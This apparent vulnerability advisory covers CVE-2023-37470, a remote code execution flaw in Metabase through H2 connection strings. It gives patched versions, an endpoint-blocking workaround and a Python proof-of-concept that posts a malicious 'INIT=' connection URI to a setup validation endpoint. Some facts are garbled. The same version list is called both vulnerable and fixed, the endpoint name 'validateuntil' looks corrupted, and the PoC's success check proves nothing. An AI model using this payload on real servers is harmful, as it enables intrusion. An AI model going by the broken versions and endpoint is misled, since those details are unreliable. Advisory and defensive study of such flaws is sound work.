CVE-2023-37470: Metabase Vulnerability Found - Remote Code Execution via H2 Database Connection String

Metabase is an open-source business intelligence and analytics platform frequently utilized for its easy-to-use interface and numerous database connection capabilities. However, it has recently been discovered that prior versions of Metabase (.43.7.3, .44.7.3, .45.4.3, .46.6.4, 1.43.7.3, 1.44.7.3, 1.45.4.3, and 1.46.6.4) contained a vulnerability that could potentially expose servers to remote code execution.

The core issue lies in the H2 embedded in-memory database, one of the supported data warehouses in Metabase. The H2 database exposes several avenues through which malicious actors can inject executable code via the connection string. As Metabase allows users to connect to databases through user-supplied strings, this vulnerability has the potential to be exploited.

Metabase provides a validation API to ensure connection strings are valid before adding databases, including during the initial setup of the platform. The validation API is the primary vector for exploitation, as it can be called without any validation.

To mitigate this issue, Metabase has released versions .43.7.3, .44.7.3, .45.4.3, .46.6.4, 1.43.7.3, 1.44.7.3, 1.45.4.3, and 1.46.6.4 that remove the ability for users to add H2 databases entirely.

As a temporary workaround for this vulnerability, users may block the relevant endpoints at the network level. To do this, block the following endpoints: POST /api/database, PUT /api/database/:id, and POST /api/setup/validateuntil. Additionally, users who rely on H2 as a file-based database should migrate to SQLite.

For more information on this vulnerability and the mitigations Metabase has put into place, refer to the official Metabase GitHub repository to review the release notes for the new versions.

Here is a code snippet demonstrating a potential exploit using the vulnerable API

import requests

# Target Metabase server
url = 'https://your-metabase-server.com';

# Sample malicious H2 connection string
payload = {
  "engine": "h2",
  "name": "Vulnerable H2 Connection",
  "details": {
    "connection-uri": "jdbc:h2:mem:;INIT=CREATE USER REMOTE_CODE_EXECUTION PASSWORD 'remote_code_execution';"
  }
}

# Vulnerable API endpoint for validating database connections
validation_url = f"{url}/api/setup/validateuntil"

response = requests.post(validation_url, json=payload)

if response.status_code == 200:
  print("Exploit successful")
else:
  print("Exploit failed")

This vulnerability, identified as CVE-2023-37470, has the potential for significant impact on Metabase servers. It is crucial for Metabase users to update their installations to the latest versions and follow the recommendations outlined above to ensure their systems remain secure.

Timeline

Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/09/2023 20:57:00 UTC